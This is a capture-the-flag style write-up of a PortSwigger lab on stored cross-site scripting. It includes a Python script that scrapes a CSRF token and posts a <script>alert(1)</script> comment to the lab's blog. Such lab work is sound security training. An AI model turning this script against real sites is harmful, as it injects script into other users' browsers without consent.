Shubham Ranpise

Back

XSS Lab 2

Stored cross-site scripting into HTML context with nothing encoded

portswigger-labs content

Stored XSS into HTML context with nothing encoded#

This lab demonstrates a stored cross-site scripting (XSS) vulnerability in the comment functionality of a blog. The application fails to encode input before rendering it in the HTML context, allowing malicious scripts to be stored and executed when the post is viewed.

By submitting a simple payload in the comment box, the script executes in the victim’s browser, demonstrating the risks of unencoded user input in web applications.

How Exploit Works#

  • Navigate to the target blog post.
  • Extract the CSRF token from the comment form.
  • Submit a comment with a <script>alert(1)</script> payload.
  • When the post is viewed, the payload executes in the browser.
  • The lab is solved once the script runs successfully.

Usage#

python3 exploit.py https://<your-lab-id>.web-security-academy.net
cmd

Exploit#

exploit.py
import requests, sys, urllib3
from bs4 import BeautifulSoup

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
proxies = {'http': 'http://127.0.0.1:8080','https': 'http://127.0.0.1:8080'}

def check_burp():
    try:
        requests.get("http://127.0.0.1:8080", proxies=proxies, timeout=3, verify=False)
    except:
        print("[-] Burp Suite not running.")
        sys.exit(1)

def exploit_xss(url, payload):
    s = requests.Session()
    s.proxies, s.verify = proxies, False

    post_page = url.rstrip("/") + "/post?postId=5"
    r = s.get(post_page); r.raise_for_status()
    soup = BeautifulSoup(r.text, "html.parser")
    csrf = soup.find("input", {"name": "csrf"})["value"]

    data = {
        "csrf": csrf,
        "postId": "5",
        "comment": payload,
        "name": "test",
        "email": "[email protected]",
        "website": "http://test.com"
    }
    s.post(url.rstrip("/") + "/post/comment", data=data).raise_for_status()

    if "Congratulations" in s.get(url).text:
        print("[+] Lab solved! 🎉"); return True
    return False

def main():
    if len(sys.argv) != 2:
        print(f"Usage: python {sys.argv[0]} <url>"); sys.exit(1)
    check_burp()
    print("[*] Attempting XSS...")
    if exploit_xss(sys.argv[1], '<script>alert(1)</script>'):
        print("[+] XSS successful!")
    else:
        print("[-] XSS unsuccessful.")

if __name__ == "__main__":
    main()
python

See more portswigger-labs